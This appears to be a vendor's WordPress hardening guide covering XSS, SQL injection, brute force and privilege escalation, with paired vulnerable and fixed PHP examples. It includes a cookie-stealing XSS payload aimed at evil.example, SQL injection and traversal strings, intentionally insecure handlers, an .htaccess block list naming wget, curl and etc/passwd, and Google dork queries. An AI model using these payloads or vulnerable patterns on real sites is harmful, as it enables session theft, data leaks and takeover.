WordPress is one of the most widely used open-source content management systems and powers millions of websites. That popularity makes it a prime target for web attackers. The WordPress team publishes security guidance and patched releases promptly, and many site owners have tightened their installations, but plenty of sites remain vulnerable for one reason or another, which makes them easy to compromise.
In this article we list the main WordPress core security issues and vulnerabilities seen in 2024, and show how to identify and fix them using various tools.
Also Read – List Of Best WordPress Security Scanners 2024
Check out the latest Vulnerable WordPress Plugins And WordPress security News
Make sure you update to the latest WordPress version. When this section was written that was 5.4.2, a security and maintenance release that came out on June 10th, 2020, following WordPress 5.4.
From time to time a WordPress release ships with a vulnerability, and working exploits for those versions have been common. The sections below look at the most important classes in more detail.
This kind of WordPress security vulnerability allows an unauthenticated user to change the content of any blog post or page on a WordPress site. When the application does not handle a request securely, an attacker can supply content through a parameter value that modifies what the page displays. Because the page is served from a trusted domain, visitors assume the content is legitimate rather than injected from outside. Also Read – WordPress REST API Vulnerability Content Injection Exploit [FIXED]
Attackers also craft links that spoof a login form in order to harvest credentials, and send them to users by email. A user who follows the link and logs in, believing the page is authentic, hands the attacker their credentials, which the attacker then uses to alter the site's content and break user trust. Two-factor authentication does not stop the injection itself, but it means a phished password alone is not enough to log in.
The primary defence against content injection (and most other core vulnerabilities) is to update your site as soon as WordPress security updates are released. – See latest WordPress Releases
Automatic background updates have been enabled by default since WordPress 3.7. If they are not running on your site, look in wp-config.php for a line that disables them (AUTOMATIC_UPDATER_DISABLED set to true, or WP_AUTO_UPDATE_CORE set to false) and remove or correct it.
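As an added example (not code from the original article), here is the wp-config.php excerpt to look for, with the disabling lines beside the value that keeps security releases installing automatically. The constant names are WordPress's own; the values chosen for the corrected line are this article's recommendation, not a site-specific requirement.

```php
<?php
// wp-config.php excerpt (added example; the constant names are WordPress's own).

// Weak: lines like these switch background updates off. If you find either in
// wp-config.php, remove it or change its value.
// define( 'AUTOMATIC_UPDATER_DISABLED', true );   // disables every background update (core, plugins, themes, translations)
// define( 'WP_AUTO_UPDATE_CORE', false );         // disables automatic core updates only

// Corrected: the default behaviour, stated explicitly. 'minor' installs security
// and maintenance releases (5.4.1 -> 5.4.2) unattended, which is what this
// section asks for; set it to true to also install major releases on sites
// that are backed up and tested regularly.
define( 'WP_AUTO_UPDATE_CORE', 'minor' );
```

Hosting control panels and some security plugins set these constants on your behalf, so check the whole file and any file it includes, not just the bottom.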
Cross-site scripting (XSS) is one of the most common web attacks: malicious script is injected into a vulnerable web application and then executed in the browsers of other users. In the stored variant discussed here, the payload is saved on the server, for example through the WordPress editor used to create and edit posts, pages and (in bbPress) topics, and is served to every visitor who loads the affected page.
The injected script runs with the site's origin, so it can steal each visitor's session cookie and other sensitive data. If an administrator views the page, the script can act on their behalf and send authenticated requests, for instance to edit the site's PHP code through the theme or plugin editor, which leads to remote code execution (RCE) and complete takeover.
Types of stored XSS vulnerability
Update your WordPress installation as soon as possible. If automatic updates are enabled, you should already be running the latest version and be protected against this vulnerability.
This is a serious vulnerability that can be abused in several ways to compromise a site. If you believe your WordPress site has been hacked, consider a professional WordPress security service.
Prevent XSS Vulnerability Plugin
This plugin encodes the following characters and then removes known XSS patterns from the URL.
Filtering URLs is only a stop-gap; the durable fix is in the code. Validate input, sanitize it before it is stored, and escape it at output for the context it is printed into (HTML body, attribute, URL or JavaScript). Together, validation, sanitization and escaping are the defence against XSS in WordPress themes and plugins.
For further reading:
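The following is an added example written for this article (not code from the page or from any plugin): a comment renderer first in its stored-XSS-prone form and then with context-aware escaping. It is plain PHP so it runs offline with `php xss.php`; the stored comment values are constructed payloads, and the two helper functions stand in for what WordPress's esc_html(), esc_attr() and esc_url() do (esc_url() additionally allows schemes such as mailto: and ftp:, which this simplified version does not).

```php
<?php
// Added example: stored XSS in a comment renderer, vulnerable and fixed.
// Plain PHP; inside WordPress use esc_html(), esc_attr() and esc_url() instead
// of the two helpers below.

// Constructed sample: what a "visitor" submitted through a comment form and
// what the application then stored in the database.
$stored = [
    'author'  => '"><script>new Image().src="https://evil.example/?c="+document.cookie</script>',
    'website' => 'javascript:alert(document.cookie)',
    'body'    => 'Nice post <script>fetch("/wp-admin/theme-editor.php")</script>',
];

// Vulnerable: every stored value is dropped into the HTML unchanged, so the
// payloads run in the browser of everyone who loads the comment.
function render_comment_vulnerable(array $c): string {
    return '<div class="comment" data-author="' . $c['author'] . '">'
         . '<a href="' . $c['website'] . '">' . $c['author'] . '</a>'
         . '<p>' . $c['body'] . '</p></div>';
}

// Escaping for an HTML body or quoted attribute (the job of esc_html()/esc_attr()).
// ENT_QUOTES also turns the double quote into &quot;, which closes the
// attribute-breakout trick in the 'author' payload.
function esc_html_ctx(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Escaping for a URL context (the job of esc_url()): allow only http/https,
// so javascript:, data: and vbscript: links are dropped, then escape the rest
// for the attribute it lands in.
function esc_url_ctx(string $url): string {
    $url    = trim($url);
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    if (!in_array($scheme, ['http', 'https'], true)) {
        return '';
    }
    return esc_html_ctx($url);
}

// Fixed: identical markup, but every value is escaped for its own context.
function render_comment_safe(array $c): string {
    return '<div class="comment" data-author="' . esc_html_ctx($c['author']) . '">'
         . '<a href="' . esc_url_ctx($c['website']) . '">' . esc_html_ctx($c['author']) . '</a>'
         . '<p>' . esc_html_ctx($c['body']) . '</p></div>';
}

echo "VULNERABLE:\n", render_comment_vulnerable($stored), "\n\n";
echo "SAFE:\n", render_comment_safe($stored), "\n";
```

Run it and compare the two outputs: in the safe version the script tags survive only as harmless text, and the javascript: link is gone. The same rule applies wherever a plugin echoes post meta, user input or options: escape late, at the point of output, with the function for that context.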
SQL is the query language used by the MySQL or MariaDB database behind WordPress. A WordPress SQL injection attack embeds SQL fragments in a request parameter (typically in the URL) that the application concatenates into a query without sanitization. The injected SQL can reveal sensitive information from the database, such as user password hashes, let the attacker log in, and change the site's content.
URL hacking, by contrast, uses crafted URLs to trigger unintended PHP behaviour, such as including a remote file, which can plant malware on the site or disclose sensitive information.
The WordPress Codex on protecting queries against SQL injection attacks (the $wpdb->prepare() API) can be found here:
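To make the difference concrete, here is an added example (written for this article, not taken from WordPress core or the Codex) of a "get published post by ID" query in its injectable form and its parameterised form. It uses an in-memory SQLite database through PDO so it runs offline with `php sqli.php` (requires the pdo_sqlite extension); the table borrows wp_posts column names but the rows are constructed.

```php
<?php
// Added example: SQL injection through an unsanitized ID, and the prepared fix.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE wp_posts (ID INTEGER, post_title TEXT, post_status TEXT)');
// Constructed rows: one public post and two that must never be shown to visitors.
$db->exec("INSERT INTO wp_posts VALUES (1, 'Hello world', 'publish'),
                                       (2, 'Unpublished draft', 'draft'),
                                       (3, 'Private board notes', 'private')");

// Vulnerable: the request parameter is concatenated straight into the SQL text,
// the same mistake as $wpdb->get_results("... WHERE ID = " . $_GET['id']).
function get_post_vulnerable(PDO $db, string $id): array {
    $sql = "SELECT ID, post_title FROM wp_posts WHERE post_status = 'publish' AND ID = " . $id;
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Fixed: the value travels as a bound parameter and can never become SQL. In
// WordPress the equivalent is
//   $wpdb->get_results( $wpdb->prepare( "... AND ID = %d", $id ) );
// and absint() on the incoming ID; the (int) cast below plays that role.
function get_post_safe(PDO $db, string $id): array {
    $stmt = $db->prepare('SELECT ID, post_title FROM wp_posts WHERE post_status = ? AND ID = ?');
    $stmt->execute(['publish', (int) $id]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$normal  = '1';
$payload = '1 OR 1=1';   // constructed injection, as it arrives from ?id=1+OR+1%3D1

// The OR in the payload turns "published AND this ID" into "anything", so the
// draft and the private post leak; the prepared version binds the payload as
// the integer 1 and returns only the public post.
printf("vulnerable, id=%-9s -> %d row(s)\n", $normal,  count(get_post_vulnerable($db, $normal)));
printf("vulnerable, id=%-9s -> %d row(s)\n", $payload, count(get_post_vulnerable($db, $payload)));
printf("safe,       id=%-9s -> %d row(s)\n", $payload, count(get_post_safe($db, $payload)));
```

Note that the injection works even though the query was "only" meant to read published posts: operator precedence in SQL (AND before OR) is what widens it. Never rely on the surrounding WHERE clause for safety; bind every value.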
Most WordPress installations run on the Apache web server, which reads per-directory rules from a file named .htaccess. (Nginx and other servers ignore .htaccess; the same blocking has to be expressed in their own configuration.)
A thorough set of rewrite rules can stop many SQL injection and URL hacking attempts before they reach PHP. Treat the ruleset below as a starting point, not a drop-in: it matches on raw query strings and user agents, so it also blocks some legitimate traffic (HEAD requests from uptime monitors, command-line API clients such as curl, and any query string containing parentheses, brackets or an http:// URL, which WordPress itself uses for the redirect_to parameter on wp-login.php). Test it against your site's real URLs before deploying, and remember that it is a filter layered on top of patched code, not a substitute for it.
<IfModule mod_rewrite.c>
# Enable rewrite engine
RewriteEngine On
# Block suspicious request methods
RewriteCond %{REQUEST_METHOD} ^(HEAD|TRACE|DELETE|TRACK|DEBUG) [NC]
RewriteRule ^(.*)$ - [F,L]
# Block requests for timthumb and similar image scripts
RewriteCond %{REQUEST_URI} (timthumb\.php|phpthumb\.php|thumb\.php|thumbs\.php) [NC]
RewriteRule ^(.*)$ - [F,L]
# Block suspicious user agents and requests
RewriteCond %{HTTP_USER_AGENT} (libwww-perl|wget|python|nikto|curl|scan|java|winhttp|clshttp|loader) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (<|>|'|%0A|%0D|%27|%3C|%3E|%00) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (;|<|>|'|"|\)|\(|%0A|%0D|%22|%27|%28|%3C|%3E|%00).*(libwww-perl|wget|python|nikto|curl|scan|java|winhttp|HTTrack|clshttp|archiver|loader|email|harvest|extract|grab|miner) [NC,OR]
RewriteCond %{THE_REQUEST} \?\ HTTP/ [NC,OR]
RewriteCond %{THE_REQUEST} \/\*\ HTTP/ [NC,OR]
RewriteCond %{THE_REQUEST} etc/passwd [NC,OR]
RewriteCond %{THE_REQUEST} cgi-bin [NC,OR]
RewriteCond %{THE_REQUEST} (%0A|%0D) [NC,OR]
# Block MySQL injections, RFI, base64, etc.
RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=http:// [OR]
RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=http%3A%2F%2F [OR]
RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=(\.\.//?)+ [OR]
RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=/([a-z0-9_.]//?)+ [NC,OR]
RewriteCond %{QUERY_STRING} \=PHP[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12} [NC,OR]
RewriteCond %{QUERY_STRING} (\.\./|\.\.) [OR]
RewriteCond %{QUERY_STRING} ftp\: [NC,OR]
RewriteCond %{QUERY_STRING} http\: [NC,OR]
RewriteCond %{QUERY_STRING} https\: [NC,OR]
RewriteCond %{QUERY_STRING} \=\|w\| [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)/self/(.*)$ [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)cPath=http://(.*)$ [NC,OR]
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} (<|%3C)([^s]*s)+cript.*(>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} (\<|%3C).*iframe.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} (<|%3C)([^i]*i)+frame.*(>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [NC,OR]
RewriteCond %{QUERY_STRING} base64_(en|de)code[^(]*\([^)]*\) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} ^.*(\[|\]|\(|\)|<|>).* [NC,OR]
RewriteCond %{QUERY_STRING} (NULL|OUTFILE|LOAD_FILE) [OR]
RewriteCond %{QUERY_STRING} (\./|\../|\.../)+(motd|etc|bin) [NC,OR]
RewriteCond %{QUERY_STRING} (localhost|loopback|127\.0\.0\.1) [NC,OR]
RewriteCond %{QUERY_STRING} (<|>|'|%0A|%0D|%27|%3C|%3E|%00) [NC,OR]
RewriteCond %{QUERY_STRING} concat[^\(]*\( [NC,OR]
RewriteCond %{QUERY_STRING} union([^s]*s)+elect [NC,OR]
RewriteCond %{QUERY_STRING} union([^a]*a)+ll([^s]*s)+elect [NC,OR]
RewriteCond %{QUERY_STRING} (;|<|>|'|"|\)|%0A|%0D|%22|%27|%3C|%3E|%00).*(/\*|union|select|insert|drop|delete|update|cast|create|char|convert|alter|declare|order|script|set|md5|benchmark|encode) [NC,OR]
# PHP-CGI Vulnerability
RewriteCond %{QUERY_STRING} ^(%2d|\-)[^=]+$ [NC,OR]
#proc/self/environ? no way!
RewriteCond %{QUERY_STRING} proc\/self\/environ [NC,OR]
RewriteCond %{QUERY_STRING} (sp_executesql) [NC]
RewriteRule ^(.*)$ - [F,L]
</IfModule>
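Because the ruleset matches the raw, still-encoded query string, the quickest way to see what it will and will not block is to run the same patterns over sample requests. The script below is an added example written for this article (not part of the page's ruleset): it transcribes a subset of the QUERY_STRING conditions above into PCRE (Apache's [NC] flag becomes the /i modifier) and runs them over constructed query strings, three attacks and three legitimate ones that WordPress or its visitors generate. Run it with `php htaccess-check.php`.

```php
<?php
// Added example: replay a subset of the .htaccess QUERY_STRING rules over
// sample query strings to see both true positives and collateral damage.

// Patterns copied from the RewriteCond lines above, one label per rule.
$rules = [
    'remote-url (http://)'       => '~[a-zA-Z0-9_]=http://~',
    'remote-url (http%3A%2F%2F)' => '~[a-zA-Z0-9_]=http%3A%2F%2F~',
    'traversal'                  => '~(\.\./|\.\.)~',
    'script-tag'                 => '~(\<|%3C).*script.*(\>|%3E)~i',
    'any-bracket'                => '~^.*(\[|\]|\(|\)|<|>).*~i',
    'mysql-file-ops'             => '~(NULL|OUTFILE|LOAD_FILE)~',
    'union-select'               => '~union([^s]*s)+elect~i',
    'sql-after-metachar'         => '~(;|<|>|\'|"|\)|%0A|%0D|%22|%27|%3C|%3E|%00).*(/\*|union|select|insert|drop|delete|update|cast|create|char|convert|alter|declare|order|script|set|md5|benchmark|encode)~i',
    'proc-self-environ'          => '~proc/self/environ~i',
];

// Return the labels of every rule that would fire for this raw query string.
// Apache evaluates the conditions with [OR], so one hit is enough for a 403.
function matched_rules(array $rules, string $query): array {
    $hits = [];
    foreach ($rules as $name => $pattern) {
        if (preg_match($pattern, $query) === 1) {
            $hits[] = $name;
        }
    }
    return $hits;
}

// Constructed samples, as they would appear in %{QUERY_STRING} (not decoded).
$samples = [
    // Attack traffic the ruleset is meant to stop:
    'id=1+UNION+SELECT+user_login,user_pass+FROM+wp_users' => 'attack: SQL injection',
    'file=../../../../etc/passwd'                          => 'attack: path traversal',
    's=%3Cscript%3Ealert(1)%3C/script%3E'                  => 'attack: reflected XSS probe',
    // Legitimate traffic the same rules also block:
    'redirect_to=http%3A%2F%2Fexample.com%2Fwp-admin%2F'   => 'legit: wp-login.php redirect on a plain-http site',
    's=hello+(world)'                                      => 'legit: site search containing parentheses',
    "s=O'Reilly+order+form"                                => 'legit: site search with an apostrophe',
];

foreach ($samples as $query => $kind) {
    $hits = matched_rules($rules, $query);
    printf("%-7s %-52s %s\n    rules: %s\n",
        $hits ? 'BLOCKED' : 'allowed', $query, $kind, $hits ? implode(', ', $hits) : '-');
}
```

Each of the three legitimate requests trips at least one rule, which is exactly what a visitor sees as a random 403. The usual remedy is to drop the broadest conditions (the bare bracket rule and the generic http: rules), keep the targeted ones (traversal, union-select, proc/self/environ), and extend this script with your own access-log URLs before every change.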
As the name suggests, a brute-force attack is an attempt to log in to your administrator panel by guessing credentials. Attackers rely on automated scripts that submit thousands or millions of username and password combinations to wp-login.php (and to xmlrpc.php, whose system.multicall method lets a single request test many passwords). The attempts load the server and slow the site down, and if one succeeds the attacker gains complete control of the website.
Two important ways to stop brute-force login attempts are to limit failed logins per client and to require a second factor for privileged accounts:
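As an added example of the first measure (written for this article; not the page's code and not any existing plugin), here is a must-use plugin that locks a client out for fifteen minutes after five failed logins. It uses only WordPress core APIs (the wp_login_failed and wp_login actions, the authenticate filter and transients); the thresholds are arbitrary choices, and the client address lookup assumes no reverse proxy or CDN in front of the site.

```php
<?php
/**
 * Plugin Name: Login attempt limiter (added example)
 * Description: Lock a client out after repeated failed logins. Save as
 *              wp-content/mu-plugins/login-limiter.php; mu-plugins need no activation.
 */

const LL_MAX_FAILURES    = 5;     // arbitrary threshold
const LL_LOCKOUT_SECONDS = 900;   // 15 minutes, arbitrary

/**
 * Transient key for the calling client. REMOTE_ADDR is the real client only
 * when nothing proxies the site; behind a CDN or reverse proxy, take the address
 * from that proxy's header instead, and only from proxies you control.
 */
function ll_client_key(): string {
    $ip = $_SERVER['REMOTE_ADDR'] ?? '0.0.0.0';
    return 'll_fail_' . md5($ip);
}

function ll_failure_count(): int {
    return (int) get_transient(ll_client_key());
}

// Count every failed login. wp-login.php, XML-RPC and application-password
// logins all raise this action, so one counter covers every entry point.
add_action('wp_login_failed', function ($username) {
    set_transient(ll_client_key(), ll_failure_count() + 1, LL_LOCKOUT_SECONDS);
});

// Refuse authentication while the client is locked out. Priority 30 runs after
// core's username/password check (priority 20), so this error replaces whatever
// core returned, and the response is identical for real and made-up accounts.
add_filter('authenticate', function ($user, $username, $password) {
    if (ll_failure_count() >= LL_MAX_FAILURES) {
        return new WP_Error(
            'too_many_failures',
            __('Too many failed login attempts. Please try again later.')
        );
    }
    return $user;
}, 30, 3);

// A successful login clears the counter for that client.
add_action('wp_login', function ($user_login, $user) {
    delete_transient(ll_client_key());
}, 10, 2);
```

Attempts made during a lockout still count as failures, so the window slides forward while the attacker keeps trying. Pair this with two-factor authentication for administrators and, if nothing on the site needs it, with blocking xmlrpc.php at the web server.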
The WordPress database holds every bit of information about your website, which makes it a favourite target. A site has a dozen or more tables, and by default they all share the prefix "wp_", so an attacker who finds an injection point can guess table names such as wp_users without any reconnaissance.
One common hardening step is to change the table prefix to something unique and unpredictable.
Be clear about what this buys you: it defeats fully automated attacks that hard-code the wp_ names, but not an attacker who can read table names from information_schema through the same injection. It is defence in depth, not a fix for the injection itself.
To change the prefix of an existing site, you can watch this video. Renaming the tables alone is not enough: $table_prefix in wp-config.php, the user_roles option and the usermeta keys that embed the prefix (capabilities, user_level) must change as well, or every user is locked out. Take a full database backup first; we strongly recommend daily backups in any case.
Another way to protect the database and the rest of the site is the iThemes Security plugin, which covers plugin vulnerabilities, weak-password attacks and outdated software.
Older WordPress versions created an administrator account named "admin" by default, and it is still the first username attackers try (current versions let you choose the name at install time). If that account exists with a weak or reused password, an attacker only has to guess the password.
Never give the attacker half the answer for free: do not keep a default "admin" account, and change any other default username.
Create a new user with a unique, hard-to-guess username, give it the administrator role, then log in as that user and delete the old "admin" account, reassigning its posts to the new user when WordPress asks.
The attacker now has to guess both the username and the password. Note that usernames can still leak through author archive URLs (?author=1) and the REST API's users endpoint, so a strong password and two-factor authentication remain essential.
As a WordPress security scanner, we see thousands of sites every day, and a large share of them have at least one sensitive file readable by anyone on the internet.
An important source of exposure is files that have nothing to do with serving the site and exist only as backup copies.
In-place editing and other administrative actions on a production web server can leave such copies behind, either created automatically by the editor (wp-config.php~, wp-config.php.swp) or by an administrator zipping a set of files or dumping the database (backup.zip, database.sql) into the web root.
These files are a serious threat because they are the easiest target: configuration files with database credentials, unreferenced files and pages, backup archives, sensitive log files and so on.
For a typical WordPress installation, disable directory listings (the Options -Indexes directive in Apache), and
add rules to the Apache .htaccess file that block access to sensitive files belonging to WordPress and to the web server itself.
To restrict wp-admin and the login page to your own IP address, add the following snippet (replace the address with yours; admin-ajax.php stays reachable because plugins call it for logged-out visitors):
<IfModule mod_rewrite.c>
RewriteEngine on
# Match the login page and the whole wp-admin directory...
RewriteCond %{REQUEST_URI} ^(.*)?wp-login\.php(.*)$ [OR]
RewriteCond %{REQUEST_URI} ^(.*)?wp-admin(/|$)
# ...except admin-ajax.php, which front-end plugins call for logged-out visitors too
RewriteCond %{REQUEST_URI} !admin-ajax\.php
# Replace 42.114.178.163 with your own public IP; add one line per allowed address
RewriteCond %{REMOTE_ADDR} !^42\.114\.178\.163$
RewriteRule ^(.*)$ - [R=403,L]
</IfModule>
This is an effective control because only requests from the listed IP addresses can reach wp-admin at all, but it only suits sites whose administrators connect from fixed addresses.
To restrict access to the WordPress configuration file, wp-config.php, add the following to the same .htaccess file (Apache 2.4 uses Require; the Order/Deny pair is the Apache 2.2 syntax). The same block form, with FilesMatch and a pattern over the backup extensions mentioned above, covers leftover copies:
<Files wp-config.php>
  <IfModule mod_authz_core.c>
    Require all denied
  </IfModule>
  <IfModule !mod_authz_core.c>
    Order allow,deny
    Deny from all
  </IfModule>
</Files>
A privilege escalation attack exploits a misconfiguration of the operating system or platform, a programming error or a design flaw to obtain more access to an application, its network or its data than the developer intended, and to perform actions the attacker is not authorised for. In WordPress terms this usually means a low-privileged account (a subscriber, contributor or author) gaining administrator capabilities, which gives the attacker complete control of the site.
Privilege escalation comes in two forms:
Vertical Privilege Escalation
A lower-privileged user gains functions reserved for a higher-privileged one, for example a subscriber who is able to change their own role, install a plugin or edit theme files. It is also called privilege elevation. (At the operating-system level the equivalent is a normal user gaining root or kernel-level code execution.)
Horizontal Privilege Escalation
The attacker stays at the same privilege level but gains access to another user's account or data, for example editing another author's posts or reading another customer's orders.
The first defence is to understand the roles and capabilities the application supports, enforce them in code (every privileged action checks a capability, never a role name or a client-supplied value, and every state-changing request carries a nonce), and set correct file permissions for WordPress.
To check which roles and capabilities a WordPress user has (source: wp-snippets):
Code Snippet:
<?php
// Role check: true if the current user has the editor role.
if ( current_user_can( 'editor' ) ) {
	// user is an editor
}
// Negated check: true if the current user is not an administrator.
if ( ! current_user_can( 'administrator' ) ) {
	// user is not an admin
}
// Capability check (preferred): true if the user can edit posts, whatever their role.
if ( current_user_can( 'edit_posts' ) ) {
	// user can edit posts
}
?>
Review these role assignments periodically.
List every role registered in WordPress.
Code Snippet:
// wp_roles() returns the global WP_Roles instance; get_names() maps slug => display name.
$role_names = wp_roles()->get_names();
foreach ( $role_names as $slug => $name ) {
	echo "$slug: $name\n";
}
To get a user's roles from the user's ID (source: stackexchange):
function get_user_roles_by_user_id( $user_id ) {
$user = get_userdata( $user_id );
return empty( $user ) ? array() : $user->roles;
}
Then an is_user_in_role() function could be implemented like so:
function is_user_in_role( $user_id, $role ) {
return in_array( $role, get_user_roles_by_user_id( $user_id ) );
}
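Checks like the ones above only help if the code that performs a privileged action actually runs them. The following added example (written for this article, not taken from WordPress core or any plugin) shows the same admin-ajax role-change handler twice: first with the pattern behind most real WordPress privilege-escalation bugs, then hardened. All functions used are WordPress core APIs; the action names, nonce action and parameter names are this example's own choices.

```php
<?php
/**
 * Plugin Name: Role change endpoint (added example)
 * Description: An admin-ajax handler in vulnerable and hardened form.
 */

// VULNERABLE. Any logged-in user can reach wp_ajax_* actions, and this handler
// trusts the role sent by the client, checks no capability and verifies no nonce.
// A subscriber posts action=set_role_insecure&role=administrator and becomes one.
add_action('wp_ajax_set_role_insecure', function () {
    $user = wp_get_current_user();
    $user->set_role(sanitize_key($_POST['role'] ?? ''));
    wp_send_json_success();
});

// HARDENED. Every decision is made server-side from the caller's capabilities;
// the client only names the target user and the desired role.
add_action('wp_ajax_set_role', function () {
    // 1. CSRF: the request must carry a nonce the page obtained from
    //    wp_create_nonce('set_role') for this logged-in user.
    check_ajax_referer('set_role');

    // 2. Capability, not role: only users allowed to promote others get past here
    //    (by default that is administrators only).
    if (!current_user_can('promote_users')) {
        wp_send_json_error('forbidden', 403);
    }

    $target_id = absint($_POST['user_id'] ?? 0);
    $role      = sanitize_key($_POST['role'] ?? '');

    // 3. The target must exist and the caller must be allowed to edit that user.
    $target = get_userdata($target_id);
    if (!$target || !current_user_can('edit_user', $target_id)) {
        wp_send_json_error('forbidden', 403);
    }

    // 4. The role must be one the caller may hand out: the same list wp-admin
    //    uses, which site owners can narrow through the 'editable_roles' filter.
    if (!array_key_exists($role, get_editable_roles())) {
        wp_send_json_error('role not assignable', 400);
    }

    // 5. Never let a user change their own role through this path; a bug here
    //    would be a self-service promotion.
    if ($target_id === get_current_user_id()) {
        wp_send_json_error('cannot change your own role', 400);
    }

    $target->set_role($role);
    wp_send_json_success(['user_id' => $target_id, 'role' => $role]);
});
```

The same five checks apply to REST API routes (use a permission_callback that calls current_user_can) and to form handlers in the admin. When reviewing a plugin, search for set_role, add_role, add_cap and update_user_meta calls and confirm that each one sits behind a capability check and a nonce.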
This vulnerability was fixed in WordPress 4.9.7 (also see Latest WordPress Versions), released on July 5, 2018. To exploit it, an attacker needed the ability to edit and delete media files, which they could obtain by taking over an Author account or by targeting sites that expose media management to lower-privileged users through plugins. Sites that had not updated and were still running outdated versions with such plugins installed were the ones mostly affected.
Before moving on, let us look at how to find security vulnerabilities in a WordPress site. Various website vulnerability scanners can check a site for security weaknesses and malware. These automated tools test the web application, normally from the outside, for vulnerabilities such as cross-site scripting and SQL injection, and so help keep it secure against attack.
A less common technique is to use search-engine queries (so-called Google dorks). Combine the strings below with the site: operator for your own domain, for example site:yourdomain.com inurl:index.php?id=; if your site shows up in the results, it exposes URL patterns that attackers routinely probe for injection, and deserves a closer look. Note that these patterns target PHP applications in general rather than WordPress specifically.
inurl:php?=id1
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
WPHH is a WordPress malware scanner that scans your entire website and reports security issues in detail. This web vulnerability scanner is easy to use, fast and accurate.
Some of the most commonly used tools are:
We hope you find this article useful. We are available to help with the different WordPress security issues covered in our WordPress security guide. If you want a website scan or the removal of a malware infection, contact us so we can analyse the security of your website and fix your WordPress site.